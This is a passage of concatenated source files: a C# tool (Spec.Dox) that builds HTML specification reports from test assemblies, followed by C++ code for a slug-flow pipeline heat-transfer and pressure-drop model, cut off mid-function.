}<file_sep>/trunk/product/Spec.Dox/Test/context_spec.cs
using MbUnit.Framework;
using Rhino.Mocks;
namespace Spec.Dox.Test
{
[TestFixture]
public abstract class context_spec
{
[SetUp]
public void SetUp()
{
UnderTheseConditions();
BecauseOf();
}
[TearDown]
public virtual void Cleanup() {}
protected abstract void UnderTheseConditions();
protected abstract void BecauseOf();
protected TypeToMock Mock<TypeToMock>() where TypeToMock : class
{
return MockRepository.GenerateMock<TypeToMock>();
}
protected TypeToMock Stub<TypeToMock>() where TypeToMock : class
{
return MockRepository.GenerateStub<TypeToMock>();
}
}
[TestFixture]
public abstract class context_spec<SystemUnderTest>
{
[SetUp]
public void SetUp()
{
sut = EstablishContext();
Because();
}
[TearDown]
public virtual void Cleanup() {}
protected abstract SystemUnderTest EstablishContext();
protected abstract void Because();
protected TypeToMock Dependency<TypeToMock>() where TypeToMock : class
{
return MockRepository.GenerateMock<TypeToMock>();
}
protected TypeToMock Stub<TypeToMock>() where TypeToMock : class
{
return MockRepository.GenerateStub<TypeToMock>();
}
protected SystemUnderTest sut { get; private set; }
}
}<file_sep>/trunk/product/Spec.Dox/ConsoleSpecs.cs
using MbUnit.Framework;
using Spec.Dox.Presentation.Presenters;
using Spec.Dox.Test;
using Spec.Dox.Test.Extensions;
using Spec.Dox.Test.MetaData;
namespace Spec.Dox
{
public class ConsoleSpecs
{
[Concern(typeof (Console))]
public class when_the_console_is_given_valid_console_arguments : context_spec<IConsole>
{
string[] command_line_arguments;
IReportPresenter presenter;
protected override IConsole EstablishContext()
{
command_line_arguments = new[] {"path", "testfixtureattributename"};
presenter = Dependency<IReportPresenter>();
return new Console(presenter);
}
protected override void Because()
{
sut.Execute(command_line_arguments);
}
[Test]
public void should_initialize_the_report_presenter()
{
presenter.received(p => p.Initialize(command_line_arguments));
}
}
}
}<file_sep>/trunk/product/Spec.Dox/Utility/Core/ISpecification.cs
namespace Spec.Dox.Utility.Core
{
public interface ISpecification<TypeToInspect>
{
bool IsSatisfiedBy(TypeToInspect item);
}
}<file_sep>/trunk/product/Spec.Dox/Presentation/Presenters/ReportPresenterSpecs.cs
using System.Collections.Generic;
using MbUnit.Framework;
using Spec.Dox.Domain;
using Spec.Dox.Domain.Repositories;
using Spec.Dox.Presentation.Views;
using Spec.Dox.Test;
using Spec.Dox.Test.Extensions;
using Spec.Dox.Test.MetaData;
namespace Spec.Dox.Presentation.Presenters
{
public interface ReportPresenterSpecs {}
[Concern(typeof (ReportPresenter))]
public class when_initializing_the_report_presenter : context_spec<IReportPresenter>
{
ITestContextRepository repository;
ITestContext context;
IHtmlReport view;
IList<ITestSpecification> specifications;
string[] args = new[] {"1", "2"};
protected override IReportPresenter EstablishContext()
{
repository = Dependency<ITestContextRepository>();
view = Dependency<IHtmlReport>();
context = Stub<ITestContext>();
specifications = new List<ITestSpecification>();
repository
.is_told_to(r => r.All("1"))
.Return(new List<ITestContext> {context});
context
.is_told_to(c => c.AllSpecifications())
.Return(specifications);
return new ReportPresenter(view, repository);
}
protected override void Because()
{
sut.Initialize(args);
}
[Test]
public void should_retrieve_each_of_the_specification_that_belong_to_the_context()
{
context.received(c => c.AllSpecifications());
}
[Test]
public void should_display_the_specification_for_each_context()
{
view.received(v => v.Add(context, specifications));
}
[Test]
public void should_generate_the_report()
{
view.received(v => v.publish_to_same_folder_as("1"));
}
}
}<file_sep>/trunk/product/Spec.Dox/Presentation/Views/IHtmlReport.cs
using System.Collections.Generic;
using System.Text;
using Spec.Dox.Domain;
namespace Spec.Dox.Presentation.Views
{
public interface IHtmlReport
{
void Add(ITestContext context, IEnumerable<ITestSpecification> specifications);
void publish_to_same_folder_as(string test_assembly_path);
}
public class HtmlReport : IHtmlReport
{
readonly IReportPublisher publisher;
readonly StringBuilder builder;
public HtmlReport() : this(new ReportPublisher()) {}
public HtmlReport(IReportPublisher publisher)
{
this.publisher = publisher;
builder = new StringBuilder();
builder.Append("<html><head><title>Specifications Document</title></head><body>");
}
public void Add(ITestContext context, IEnumerable<ITestSpecification> specifications)
{
builder.AppendFormat("<h1>{0}</h1>", context.Name.Replace("_", " "));
builder.Append("<ul>");
foreach (var specification in specifications)
{
builder.AppendFormat("<li>{0}</li>", specification.Name.Replace("_", " "));
}
builder.Append("</ul>");
}
public void publish_to_same_folder_as(string test_assembly_path)
{
builder.Append("</body></html>");
publisher.Publish(builder.ToString(), test_assembly_path);
}
}
}<file_sep>/trunk/product/Spec.Dox/Test/MetaData/ConcernAttribute.cs
using System;
namespace Spec.Dox.Test.MetaData
{
[AttributeUsage(AttributeTargets.Class)]
public class ConcernAttribute : Attribute
{
public ConcernAttribute(Type systemUnderTest)
{
SystemUnderTest = systemUnderTest;
}
public Type SystemUnderTest { get; private set; }
}
}<file_sep>/trunk/product/Spec.Dox/Domain/IMethodIsDecoratedBySpecificationAttribute.cs
using System;
using System.Reflection;
using Spec.Dox.Utility.Core;
namespace Spec.Dox.Domain
{
public interface IMethodIsDecoratedBySpecificationAttribute : ISpecification<MethodInfo> {}
public class MethodIsDecoratedBySpecificationAttribute : IMethodIsDecoratedBySpecificationAttribute
{
readonly string name_of_the_attribute_to_lookup;
public MethodIsDecoratedBySpecificationAttribute() : this(Environment.GetCommandLineArgs()[2]) {}
public MethodIsDecoratedBySpecificationAttribute(string nameOfAttributeToLookup)
{
name_of_the_attribute_to_lookup = nameOfAttributeToLookup;
}
public bool IsSatisfiedBy(MethodInfo item)
{
foreach (var attribute in item.GetCustomAttributes(true))
{
if (attribute.GetType().Name.Equals(name_of_the_attribute_to_lookup))
return true;
}
return false;
}
}
}<file_sep>/trunk/product/Spec.Dox/Presentation/Views/HtmlReportSpecs.cs
using System.Collections.Generic;
using MbUnit.Framework;
using Rhino.Mocks;
using Spec.Dox.Domain;
using Spec.Dox.Test;
using Spec.Dox.Test.Extensions;
using Spec.Dox.Test.MetaData;
namespace Spec.Dox.Presentation.Views
{
public class HtmlReportSpecs {}
[Concern(typeof (HtmlReport))]
public class when_publishing_an_html_report_with_specification_added_to_it : context_spec<IHtmlReport>
{
IReportPublisher publisher;
protected override IHtmlReport EstablishContext()
{
publisher = Dependency<IReportPublisher>();
var fixture = Stub<ITestContext>();
var testSpecification = Stub<ITestSpecification>();
fixture.is_told_to(f => f.Name).Return("when_a_blah_blah");
testSpecification.is_told_to(t => t.Name).Return("should_do_some_stuff");
var context = new HtmlReport(publisher);
context.Add(fixture, new List<ITestSpecification> {testSpecification});
return context;
}
protected override void Because()
{
sut.publish_to_same_folder_as("path");
}
[Test]
public void should_publish_the_correct_html()
{
var expected_html =
"<html><head><title>Specifications Document</title></head><body><h1>when a blah blah</h1><ul><li>should do some stuff</li></ul></body></html>";
publisher.received(p => p.Publish(Arg<string>.Is.Equal(expected_html), "path"));
}
}
}<file_sep>/trunk/product/Spec.Dox/Domain/ITypeContainsSpecifications.cs
using System;
using Spec.Dox.Utility.Core;
namespace Spec.Dox.Domain
{
public interface ITypeContainsSpecifications : ISpecification<Type> {}
public class TypeContainsSpecifications : ITypeContainsSpecifications
{
IMethodIsDecoratedBySpecificationAttribute criteria;
public TypeContainsSpecifications() : this(new MethodIsDecoratedBySpecificationAttribute()) {}
public TypeContainsSpecifications(IMethodIsDecoratedBySpecificationAttribute criteria)
{
this.criteria = criteria;
}
public bool IsSatisfiedBy(Type item)
{
foreach (var method in item.GetMethods())
{
if (criteria.IsSatisfiedBy(method))
return true;
}
return false;
}
}
}<file_sep>/trunk/product/Spec.Dox/Test/Extensions/AssertionExtensions.cs
using MbUnit.Framework;
namespace Spec.Dox.Test.Extensions
{
static public class AssertionExtensions
{
static public void should_be_equal_to<T>(this T itemToCheck, T itemToBeEqualTo)
{
Assert.AreEqual(itemToBeEqualTo, itemToCheck);
}
}
}<file_sep>/trunk/product/Spec.Dox/IConsole.cs
using System.Collections.Generic;
using Spec.Dox.Presentation.Presenters;
namespace Spec.Dox
{
public interface IConsole
{
void Execute(IEnumerable<string> command_line_arguments);
}
public class Console : IConsole
{
readonly IReportPresenter presenter;
public Console() : this(new ReportPresenter()) {}
public Console(IReportPresenter presenter)
{
this.presenter = presenter;
}
public void Execute(IEnumerable<string> command_line_arguments)
{
presenter.Initialize(command_line_arguments);
}
}
}<file_sep>/trunk/product/Spec.Dox/Presentation/Presenters/IReportPresenter.cs
using System.Collections.Generic;
using System.Linq;
using Spec.Dox.Domain.Repositories;
using Spec.Dox.Presentation.Views;
namespace Spec.Dox.Presentation.Presenters
{
public interface IReportPresenter
{
void Initialize(IEnumerable<string> command_line_arguments);
}
public class ReportPresenter : IReportPresenter
{
readonly IHtmlReport report;
readonly ITestContextRepository repository;
public ReportPresenter() : this(new HtmlReport(), new TestContextRepository()) {}
public ReportPresenter(IHtmlReport report, ITestContextRepository repository)
{
this.report = report;
this.repository = repository;
}
public void Initialize(IEnumerable<string> command_line_arguments)
{
foreach (var context in repository.All(command_line_arguments.ElementAt(0)))
report.Add(context, context.AllSpecifications());
report.publish_to_same_folder_as(command_line_arguments.ElementAt(0));
}
}
}<file_sep>/trunk/product/Spec.Dox/Utility/Core/IFactory.cs
namespace Spec.Dox.Utility.Core
{
public interface IFactory<TypeToCreate>
{
TypeToCreate Create();
}
}<file_sep>/trunk/product/Spec.Dox/Test/Extensions/MockingExtensions.cs
using System;
using Rhino.Mocks;
using Rhino.Mocks.Interfaces;
namespace Spec.Dox.Test.Extensions
{
static public class MockingExtensions
{
static public void received<T>(this T typeToVerify, Action<T> actionToPerform)
{
typeToVerify.AssertWasCalled(actionToPerform);
}
static public IMethodOptions<R> is_told_to<T, R>(this T typeToVerify, Function<T, R> actionToPerform) where T : class
{
return typeToVerify.Stub(actionToPerform);
}
}
}<file_sep>/trunk/product/Spec.Dox/Domain/ITestSpecification.cs
using System.Reflection;
namespace Spec.Dox.Domain
{
public interface ITestSpecification
{
string Name { get; }
}
public class TestSpecification : ITestSpecification
{
public TestSpecification(MethodInfo method)
{
Name = method.Name;
}
public string Name { get; private set; }
}
}<file_sep>/trunk/product/Spec.Dox/Domain/ITestContext.cs
using System;
using System.Collections.Generic;
namespace Spec.Dox.Domain
{
public interface ITestContext
{
string Name { get; }
IEnumerable<ITestSpecification> AllSpecifications();
}
public class TestContext : ITestContext
{
readonly Type type;
IMethodIsDecoratedBySpecificationAttribute methodCriteria;
public TestContext(Type type) : this(type, new MethodIsDecoratedBySpecificationAttribute()) {}
public TestContext(Type type, IMethodIsDecoratedBySpecificationAttribute methodCriteria)
{
this.type = type;
this.methodCriteria = methodCriteria;
Name = type.Name;
}
public string Name { get; private set; }
public IEnumerable<ITestSpecification> AllSpecifications()
{
foreach (var method in type.GetMethods())
{
if (methodCriteria.IsSatisfiedBy(method))
yield return new TestSpecification(method);
}
}
}
}<file_sep>/trunk/product/Spec.Dox/Program.cs
using System;
using System.Collections.Generic;
using System.Reflection;
namespace Spec.Dox
{
public class Program
{
static void Main(string[] args)
{
try
{
dispay(args);
new Console().Execute(args);
}
catch (ReflectionTypeLoadException e)
{
System.Console.Out.WriteLine(e);
foreach (var error in e.LoaderExceptions)
{
System.Console.Out.WriteLine(error);
}
}
catch (Exception e)
{
System.Console.Out.WriteLine(e);
System.Console.Out.WriteLine("spec.dox.exe [full path to assembly to inspect] [full name of attribute decorating each test]");
System.Console.Out.WriteLine("e.g...");
System.Console.Out.WriteLine("spec.dox.exe c:/development/test.dll TestAttribute");
}
}
static void dispay(IEnumerable<string> args)
{
System.Console.Out.WriteLine("Received:");
foreach (var arg in args) System.Console.Out.WriteLine(arg);
System.Console.Out.WriteLine();
}
}
} | db019055a438b6306dc150fda6f53c635b04b243 | [
"Markdown",
"C#"
] | 21 | C# | mokhan/spec.dox | 4ba6094e00f2334eacf94e2bd6ea904cd3725668 | 461ac5e059f1a4d133ac239f6abbacd65d581477 |
refs/heads/master | <file_sep>#define _USE_MATH_DEFINES
#include <iostream>
#include <cmath>
#include <vector>
#include "CaseSpecificInputs.h"
#include "SlugFlowFilmProfile.h"
#include "StratifiedFlowGeometry.h"
#include "dPCalculation.h"
namespace MultiphaseTemperature {
PressureCal::PressureCal(std::vector<double>& Inputs, std::vector<double>& HydroInputs)
{
VSL = Inputs[0];
VSG = Inputs[1];
ID = Inputs[2];
T = Inputs[3];
P = Inputs[4];
PipeRoughness = Inputs[5];
IT = Inputs[6];//InterfactialTension
LfInitial = HydroInputs[0];
dx = HydroInputs[1];
Epsilon = HydroInputs[2];
hMax = HydroInputs[3];
EpsilonZh = HydroInputs[4];
zArray.clear();
HLTBArray.clear();
user::PipeGeometry PipeProps;
user::FluidProperties Fluid(T, P);
FilmProfile Film(Inputs);
//Fluid Properties
RhoG = Fluid.Gas.Rho(Fluid);
RhoL = Fluid.Liquid.Rho(Fluid);
MuL = Fluid.Liquid.Mu(Fluid);
MuG = Fluid.Gas.Mu(Fluid);
//Now lets call the hydrodynamic properties
Film.HyrodynamicProperties(LfInitial, dx, Epsilon, hMax, EpsilonZh);
//Slug section properties
HLLS=Film.HLLS;
ZSize = Film.ZSize;
RhoS = RhoL * HLLS + RhoG * (1 - HLLS);
MuS = MuL * HLLS + MuG * (1 - HLLS);
Lf = Film.LfFinal;
Ls= Film.Ls;
Vm = Film.Vm;
HLTBAvg= Film.HLTBAvg;
VTb = Film.VTb;
VLLS = Film.VLLS;
VGLS = Film.VGLS;
//Assigning HLTB in z direction calculated by RKF45
for (int i = 0; i < ZSize + 1; i++)
{
zArray.push_back(Film.XSave[i]);
HLTBArray.push_back(Film.HLTBSave[i]);
}
fS = Film.FannningFrictionFactor(RhoS, Vm, ID, MuS, PipeRoughness);
ShearS = fS * RhoS*Vm*Vm / 2.0;
PressSlug = (ShearS * M_PI*ID / (M_PI*0.25*ID*ID))*Ls;
double z;
double HLTB;
PressFilm = 0;
PressGas = 0;
PressSFilm = 0;
PressSGas = 0;
for (int i = 1; i < ZSize + 1; i++) //Check this for 2
{
z= (zArray[i] - zArray[i-1]);
HLTB=(HLTBArray[i] + HLTBArray[i-1])/2.0;
StratifiedFlowGeometry Geometry(HLTB,ID);
AF = Geometry.ALTilt*ID*ID;
AG = Geometry.AGTilt*ID*ID;
SG = Geometry.SGTilt*ID;
SF = Geometry.SLTilt*ID;
SI = Geometry.SITilt*ID;
VF = (VTb - VLLS)*HLLS / HLTB;
VG = (VTb - VGLS)*(1 - HLLS) / (1 - HLTB);
VLTB= VTb - VF;
VGTB= VTb - VG;
fF = Film.FannningFrictionFactor(RhoL, abs(VLTB),
4 * AF / SF, MuL, PipeRoughness);
fG = Film.FannningFrictionFactor(RhoG, abs(VGTB),
4 * AG / (SI + SG), MuG, PipeRoughness);
ShearF = fF * RhoL*abs(VLTB)*VLTB / 2.0;
ShearG = fG * RhoG*abs(VGTB)*VGTB / 2.0;
PressFilm = PressFilm+ShearF * SF*z / (M_PI*0.25*ID*ID);
PressGas = PressGas+ShearG * SG*z / (M_PI*0.25*ID*ID);
//For hibiki X-Parameter, these factors are needed
fSF = Film.FannningFrictionFactor(RhoL, VSL, M_PI*ID*ID*0.25, MuL, PipeRoughness);
fSG = Film.FannningFrictionFactor(RhoG, VSG, M_PI*ID*ID*0.25, MuG, PipeRoughness);
ShearSF = fSF * RhoL*VSL*VSL / 2.0;
ShearSG = fSG * RhoG*VSG*VSG / 2.0;
PressSFilm = PressSFilm + ShearSF * (SF + SF)*z / (M_PI*0.25*ID*ID);
PressSGas = PressSGas + ShearSG * (SF + SF)*z / (M_PI*0.25*ID*ID);
}
dP = (PressGas + PressFilm + PressSlug)*0.000145038;
}
}//End of MultiphaseTemperature namespace
<file_sep>#define _USE_MATH_DEFINES
#include <cmath>
#include <iostream>
#include <fstream>
#include <vector>
#include <math.h>
#include <iomanip>
#include "CaseSpecificInputs.h"
#include "StratifiedFlowGeometry.h"
#include "SlugFlowFilmProfile.h"
#include "SlugFlowHeatTransfer.h"
#include "dPCalculation.h"
#include "OveralHeatTransfer.h"
namespace MultiphaseTemperature {
/* IMPORTANT NOTE
In this method, the objective is to find correct hydrodynamic properties
for t=Tu. The hydrodynamic properties are calcualted based on the
thermophysical properties of liquid and gas and they are heavility dependent
on temperature. However, the temperature anywhere in the slug unit changes
with time and with location. Therefore, thermophysical properties change too.
In addition to thermophysical properties, wax characteristics also change
including the thickness and ultimately the effective pipe's radius which is
very important for hydrodynamic property estimation. This inconsostency needed
to get fixed. In the following method, we find the most appropeiate temperature
for hydrodynamic property calculation. This iterative process is to check Lf
with temperature. Since wax deposition calculation is costly (timely), we
did not included the wax thickness update. In other word, wax characteristics
at tIniial is considered. This assumption should note jepordize the accuracy much*/
/*The following method was checked for many flow rates. While following method's
importance might not be obvious at the first seen but it is!!
For VSG=10 and VSL=1, the average temperautre calculated to be ALOT different than the
intiial Temperature */
double SlugFlowOveralHeatTranfer::
AvgTempForHydroUpdate(std::vector<double>& FilmInputs,
std::vector<std::vector<double>>& WaxWidthVector,
std::vector<std::vector<double>>& WaxSolidFraction,
std::vector<double>& HydroInputs,
std::vector<std::vector<std::vector<double>>>& TwInitial,
std::vector<double>& Ts, std::vector<double>& Tf,
std::vector<double>& Tg, std::vector<double>& FilmAssign,
std::vector<bool>& SlugAssign, std::vector<double>& q,
double TInlet, double EpsLimit){
double Lf1=100, Lf2;
double Eps =100;
std::vector<std::vector<double>> Save;
Save.resize(1000);
for (int j = 0; j < 1000; j++) {
Save[j].resize(50 + 1);
}
double AvgTb= 0;
int count = 0;
//t=Tu
while (Eps > EpsLimit)
{
//Counter of the number of iteration
count = count + 1;
AvgTb = 0;
MultiphaseTemperature::SlugFLowHeatTransferCal OBJ;
Lf2 = Lf1;
OBJ.HydroUpdate(FilmInputs, HydroInputs);
Lf1 = OBJ.Lf;
for (int t = 0; t < OBJ.Nx; t++)
{
OBJ.SlugFlowHeatModel(FilmInputs, WaxWidthVector,
WaxSolidFraction, HydroInputs,
TwInitial, Ts, Tf, Tg, FilmAssign,
SlugAssign, q, TInlet);
AvgTb = AvgTb + OBJ.AvgTb;
TwInitial = OBJ.Tw;
Ts = OBJ.TS;
Tf = OBJ.TL;
Tg = OBJ.TG;
OBJ.SlugFlowBooleanLater(SlugAssign, FilmAssign);
SlugAssign = OBJ.SlugFlow;
FilmAssign = OBJ.HLTbLocation;
}
std::cout << OBJ.NuNumCal << " " << OBJ.SumhCheck<<std::endl;
AvgTb = AvgTb / double(OBJ.Nx);
FilmInputs[3] = AvgTb - 273.15;
Eps = abs(Lf1 - Lf2);
}
return(AvgTb);
}
/* From the previous method, the AvgTb temperature for the correct
calcualtion of hydrodynamic properties is done. This temperature can
be used now for further calcualtion and larger time
*/
} //end of MultiphaseTemperature namespace<file_sep>#define _USE_MATH_DEFINES
#include <cmath>
#include <iostream>
#include <fstream>
#include <vector>
#include <math.h>
#include <iomanip>
#include "CaseSpecificInputs.h"
#include "StratifiedFlowGeometry.h"
#include "SlugFlowFilmProfile.h"
#include "SlugFlowHeatTransfer.h"
#include "dPCalculation.h"
namespace MultiphaseTemperature {
double s1 = 0; bool s2;
void SlugFLowHeatTransferCal::
SlugFlowHeatModel(std::vector<double>& FilmInputs,
std::vector<std::vector<double>>& WaxWidthVector,
std::vector<std::vector<double>>& WaxSolidFraction,
std::vector<double>& HydroInputs,
std::vector<std::vector<std::vector<double>>>& TwInitial,
std::vector<double>& Ts, std::vector<double>& Tf,
std::vector<double>& Tg, std::vector<double>& FilmAssign,
std::vector<bool>& SlugAssign, std::vector<double>& q,
double TInlet) {
SetVariablesFromIputFiles(FilmInputs,WaxWidthVector, WaxSolidFraction,
TwInitial,Ts,Tf,Tg, FilmAssign, SlugAssign);
//The requried vector sizes are assigned
VectorResize();
//In this simplified case, Inlet temperature is assumed to be constant and the same as
AvgTb = 0;
//Pipe specs
const user::PipeGeometry PipeProps;
PipeSpecs(PipeProps);
//This method uses the pipe's ID from the above method (PipeSpecs(PipeProps);)
IDEf = IDEff(WaxWidthVector);
Update(AvgTempForHydroUpdate, HLLS);
for (int xx = 0; xx < Nx; xx++)
{
/*Effective surface area of pipe is different axially so, and
it is calculated by averaging the 4 peaces surface areas of the pipe*/
ApEff[xx] = 0.25*M_PI*(pow((ri - WaxThickness[xx][1]), 2)
+ pow((ri - WaxThickness[xx][2]), 2) + pow((ri - WaxThickness[xx][3]), 2)
+ pow((ri - WaxThickness[xx][4]), 2));
//ApEff[xx] = M_PI * ri*ri;
if (SlugFlow[xx] == false)
{
//flow geometries are calculated and reported by the following method
HLTBAvg = HLTbLocation[xx];
const StratifiedFlowGeometry FlowGeom(HLTBAvg, IDEf);
UpdateFlowGeomParams(FlowGeom, HLTBAvg);
}
for (int WL = 1; WL < WallLay + 1; WL++) //starts from 1 to 4
{
//starts from 1 to 3. Due to symmetry, Ring 2 is assigned to Ring 4
for (int RS = 1; RS < RingSec; RS++)
{
//Thermal conductivity coefficient is assingned for wax and pipe layers
if (WL == 1) {
KThermal = WaxDepoK(Tw[xx][WL][RS], WaxSolidFrac[xx][RS]);
KDepoSave[xx][RS] = KThermal;
}
else {
KThermal = KPipe;
}
if (WL == 1) //Inner layer contacting the fluid
{
//This method assignes the AG and AL arrays
SurfaceAreaAGAL(thetahF, WaxThickness[xx][3],
WaxThickness[xx][2], WaxThickness[xx][1]);
}
//Es calcualations
if (WL == WallLay)
{
Es[xx][WL][RS] = q[xx] * Aout(WL)*dt;
check = Aout(WL);
}
else
{
//double T[NTime + 1][Nx + 1][WLay + 1][RingSec + 1];
Es[xx][WL][RS] = Aout(WL) * KThermal*(Tw[xx][WL + 1][RS] -
Tw[xx][WL][RS])*dt*3.0 / w;
}
//Er calcualations
//For the most inner layer, the caculations are calculated based on theta
if (WL == 1) //Heat is convectively transfered from liquid to the wall
{
if (SlugFlow[xx] == true)
{
//The following if, else is to take care of the x=0 and x=N-1
if (xx == Nx - 1)
{
//The boundary condition of dT/dx is assumed for the end part
Update(TS[xx], HLLS);
Er[xx][WL][RS] = -Ain(WL, WaxThickness[xx][RS])*HeatCoe(KS, IDEf,
RhoS, Vm, MuS, CpS) *dt*(Tw[xx][WL][RS] - TS[xx]);
}
else //Other xx other than the last one
{
Update(TS[xx], HLLS);
Er[xx][WL][RS] = -Ain(WL, WaxThickness[xx][RS])*
HeatCoe(KS, IDEf, RhoS, Vm, MuS, CpS)*
dt*((Tw[xx + 1][WL][RS] + Tw[xx][WL][RS])
/ 2.0 - TS[xx]);
}
EWsLocal[RS] = -Er[xx][WL][RS];
if (RS == 2)
EWsLocal[4] = EWsLocal[2];
}
else //Film section
{
//the following if and else statements are to care of x=N-1
if (xx == Nx - 1)
{
AvgTemp = Tw[xx][WL][RS];//This variable is used in Er calculations
}
else
{
//This variable is used in Er calculations
AvgTemp = (Tw[xx + 1][WL][RS] + Tw[xx][WL][RS]) / 2.0;
}
//EwfLocal and EwgLocal
Update(TL[xx], HLLS); EwfLocal[RS] = AL[RS] * HeatCoe(KL, dL, RhoL, VLTB,
MuL, CpL)*dt*(AvgTemp - TL[xx]);
Update(TG[xx], HLLS); EwgLocal[RS] = AG[RS] * HeatCoe(KG, dG, RhoG, VGTB,
MuG, CpG)*dt*(AvgTemp - TG[xx]);
//Er calculation
Er[xx][WL][RS] = -(EwfLocal[RS] + EwgLocal[RS]);
//Assigning RS=2 to RS=4 (sidewall section are the same)
if (RS == 2) { EwfLocal[4] = EwfLocal[2]; EwgLocal[4] = EwgLocal[2]; }
}
}
else //Wall layers other than the first one
{
Er[xx][WL][RS] = -Ain(WL, WaxThickness[xx][RS]) *
KThermal*(Tw[xx][WL][RS] -
Tw[xx][WL - 1][RS])*dt*3.0 / w;
}
//the following if and else statements are to care of x=N-1
if (xx == Nx - 1)
{
Ex[xx][WL][RS] = Ax(WL, WaxThickness[xx][RS]) *
KThermal*dt*(1 / dX)*(Tw[xx][WL][RS] -
2 * Tw[xx][WL][RS] + Tw[xx - 1][WL][RS]);
}
else if (xx == 0)
{
Ex[xx][WL][RS] = Ax(WL, WaxThickness[xx][RS]) *
KThermal*dt*(1 / dX)*(Tw[xx + 1][WL][RS] -
2 * Tw[xx][WL][RS] + TInlet);
}
else // xx other than xx==0 and xx=Nx-1
{
Ex[xx][WL][RS] = Ax(WL, WaxThickness[xx][RS]) *
KThermal*dt*(1 / dX)*(Tw[xx + 1][WL][RS] -
2 * Tw[xx][WL][RS] + Tw[xx - 1][WL][RS]);
}
if (RS == 1)
{
ETheta[xx][WL][RS] = ATheta(WL, WaxThickness[xx][RS]) *
KThermal*dt*(1 / dxTheta(WL, WaxThickness[xx][RS]))*
(Tw[xx][WL][RS + 1] - 2 * Tw[xx][WL][RS]
+ Tw[xx][WL][4]);
}
else { //Ring section other than the first one
ETheta[xx][WL][RS] = ATheta(WL, WaxThickness[xx][RS]) *
KThermal*dt*(1 / dxTheta(WL, WaxThickness[xx][RS]))*
(Tw[xx][WL][RS + 1] - 2 * Tw[xx][WL][RS]
+ Tw[xx][WL][RS - 1]);
}
//balance equations for ring elements
if (WL == 1)
{
//CPL was used for the heat capacity of the wax deposition, PLEASE CHECK!!
Tw[xx][WL][RS] = Tw[xx][WL][RS] + (Es[xx][WL][RS] +
Er[xx][WL][RS] + Ex[xx][WL][RS] + ETheta[xx][WL][RS])
/ (Ax(WL, WaxThickness[xx][RS])*dX*RhoDepo*CpL);
}
else
{
Tw[xx][WL][RS] = Tw[xx][WL][RS] + (Es[xx][WL][RS] +
Er[xx][WL][RS] + Ex[xx][WL][RS] + ETheta[xx][WL][RS])
/ (Ax(WL, WaxThickness[xx][RS])*dX*RhoPipe*CPPipe);
}
if (RS == 2)
{
//In this section, the energy of section 4 will be assigned by the energies of section 2
Es[xx][WL][4] = Es[xx][WL][RS];
Er[xx][WL][4] = Er[xx][WL][RS];
Ex[xx][WL][4] = Ex[xx][WL][RS];
ETheta[xx][WL][4] = ETheta[xx][WL][RS];
Tw[xx][WL][4] = Tw[xx][WL][RS];
//std::cout << std::setprecision(10) << Tw[tt + 1][xx][WL][4] << " ";
}
}//End of Ring section of one ring
}//End of Wall layer
if (SlugFlow[xx] == false)
{
sumWF = 0;
sumWG = 0;
//In here the forth ring section should also be included
for (int itr = 1; itr < RingSec + 1; itr++)
{
sumWF = EwfLocal[itr] + sumWF;
sumWG = EwgLocal[itr] + sumWG;
}
EWf[xx] = sumWF;
EWG[xx] = sumWG;
}
else
{
sumWS = 0;
//In here the forth ring section should also be included
for (int itr = 1; itr < RingSec + 1; itr++)
{
sumWS = EWsLocal[itr] + sumWS;
}
EWS[xx] = sumWS;
}
//the following if and else statements are to take care of x=N-1 Based on dT/dx
if (xx == Nx - 1)
{
if (SlugFlow[xx] == false)
{
ECF[xx] = 0;
ECG[xx] = 0;
}
else // slug
{
ECS[xx] = 0;
}
}
else
{
if (SlugFlow[xx] == false)
{
Update(TL[xx], HLLS);
if (HLTbLocation[xx + 1] > 0.000001) {
HLTB2 = HLTbLocation[xx + 1];
}
else {
HLTB2 = HLTBAvg;
}
Update(TL[xx + 1], HLLS);
//ECF[xx] = ECF2- ECF1;
Update((TL[xx + 1] + TL[xx]) / 2.0, HLLS);
ECF[xx] = (VTb - VLTB)*ApEff[xx] * HLTBAvg*RhoL*
CpL*dt*(TL[xx + 1] - TL[xx]);
Update(TG[xx], HLLS);
ECG1 = Cs * ApEff[xx] * Vm*(1 - HLLS)*dt*CpG*RhoG*TG[xx];
Update(TG[xx + 1], HLLS);
ECG2 = Cs * ApEff[xx + 1] *
Vm*(1 - HLLS)*dt*CpG*RhoG*TG[xx + 1];
Update((TG[xx + 1] + TG[xx]) / 2.0, HLLS);
ECG[xx] = Cs * ApEff[xx] * Vm*(1 - HLLS)*
dt*CpG*RhoG*(TG[xx + 1] - TG[xx]);
}
else // Slug
{
Update(TS[xx], HLLS);
Update((TS[xx + 1] + TS[xx]) / 2.0, HLLS);
ECS[xx] = Cs * ApEff[xx] * Vm*RhoS*CpS*dt*(TS[xx + 1] - TS[xx]);
}
}
TwAv[xx] = (Tw[xx][1][1] + Tw[xx][1][2] + Tw[xx][1][3] + Tw[xx][1][4]) / 4.0;
//Now the balance equations can be written for TL,TG and TS
if (SlugFlow[xx] == false)
{
//needs fix
UInt = 1 / (1 / (HeatCoe(KG, dG, RhoG, abs(VGTB - VLTB), MuG, CpG))
+ 1 / (HeatCoe(KL, dL, RhoL, abs(VGTB - VLTB), MuL, CpL)));
//Future TG
TG[xx] = TG[xx] + (EWG[xx] + ECG[xx] + SI * dX* UInt*dt*(TL[xx] - TG[xx])) /
((1 - HLTBAvg)*ApEff[xx] * dX*CpG*RhoG);
//Future TL
TL[xx] = TL[xx] + (EWf[xx] + ECF[xx] + SI * dX * UInt*dt*(TG[xx] - TL[xx])) /
(HLTBAvg*ApEff[xx] * dX*CpL*RhoL);
TLActual[xx] = TL[xx]; TGActual[xx] = TG[xx];
//Future Tb
Tb[xx] = (TL[xx] * VLTB*ALP + TG[xx] * VGTB*AGP) /
(VLTB*ALP + VGTB * AGP);
AvgTb = AvgTb + Tb[xx];
Kb[xx] = (KLSave * VLTB*ALP + KG * KGSave*AGP) /
(VLTB*ALP + VGTB * AGP);
TS[xx] = Tb[xx];
QFSum = QFSum + (EWf[xx] + EWG[xx])*dX / (dX*dt*M_PI*IDEf);
TfSum = TfSum + (-Tb[xx] + TwAv[xx])*dX;
hHotSave[xx] = QFSum / TfSum;
}
else //Slug
{
Update(TS[xx], HLLS);
TG[xx] = TG[xx] + (1 - HLLS)*(ECS[xx] + EWS[xx]) / (ApEff[xx] * dX*RhoS*CpS);
TL[xx] = TL[xx] + HLLS * (ECS[xx] + EWS[xx]) / (ApEff[xx] * dX*RhoS*CpS);
TS[xx] = TS[xx] + (ECS[xx] + EWS[xx]) / (ApEff[xx] * dX*RhoS*CpS);
TLActual[xx] = TS[xx];
